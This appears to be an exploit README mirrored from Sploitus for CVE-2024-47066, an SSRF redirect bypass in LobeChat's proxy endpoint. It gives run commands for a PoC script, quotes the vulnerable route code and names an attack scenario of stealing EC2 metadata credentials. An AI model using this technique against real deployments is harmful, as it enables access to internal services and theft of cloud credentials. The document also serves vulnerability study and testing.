## https://sploitus.com/exploit?id=E51CE615-6C05-5C1A-B002-006A4153002A
# CVE-2024-47066
โ CVE-2024-47066 LobeChat SSRF PoC โ
## Description
**CVE-2024-47066** : Lobe Chat is an open-source artificial intelligence chat framework. Prior to version 1.19.13, server-side request forgery protection implemented in `src/app/api/proxy/route.ts` does not consider redirect and could be bypassed when attacker provides an external malicious URL which redirects to internal resources like a private network or loopback address. Version 1.19.13 contains an improved fix for the issue.
**Reporter**: [a1loy](https://github.com/a1loy)
## How to use
### Git clone
git clone https://github.com/l8BL/CVE-2024-47066.git
cd CVE-2024-47066
### Setup Vulnerable Environment
cd docker
docker-compose up -d
(External) LodeChat --> **SSRF ATTACK** --> (Internal) http://www.internal-service:4000
### Install packages
pip install -r requirements.txt
### Command
python3 CVE-2024-47066.py -v <URL_TO_EXPLOIT> -i <URL_TO_REQUEST>
### Example
python3 CVE-2024-47066.py -v http://localhost:3210 -i http://www.internal-service:4000
### Output
![alt text](./assets/1.png)
### Result
![alt text](./assets/2.png)
# Analysis
## Vulnerable point (/app/api/proxy/route.ts)
import { isPrivate } from 'ip';
import { NextResponse } from 'next/server';
import dns from 'node:dns';
import { promisify } from 'node:util';
const lookupAsync = promisify(dns.lookup);
export const runtime = 'nodejs';
* just for a proxy
export const POST = async (req: Request) => {
const url = new URL(await req.text());
let address;
try {
const lookupResult = await lookupAsync(url.hostname);
address = lookupResult.address;
} catch (err) {
console.error(`${url.hostname} DNS parser error:`, err);
return NextResponse.json({ error: 'DNS parser error' }, { status: 504 });
const isInternalHost = isPrivate(address);
if (isInternalHost)
return NextResponse.json({ error: 'Not support internal host proxy' }, { status: 400 });
const res = await fetch(url.toString());
return new Response(res.body, { headers: res.headers });
Below line 26, there is nowhere to determine the Redirect response. So, when using a URL shortener, you can easily bypass the "isPrivate()" function.
# Attack Scenario
## Steal EC2 Metadata Credentials
Make Request to
# Disclaimer
This repository is not intended to be SSRF exploit to CVE-2024-47066. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
# Reference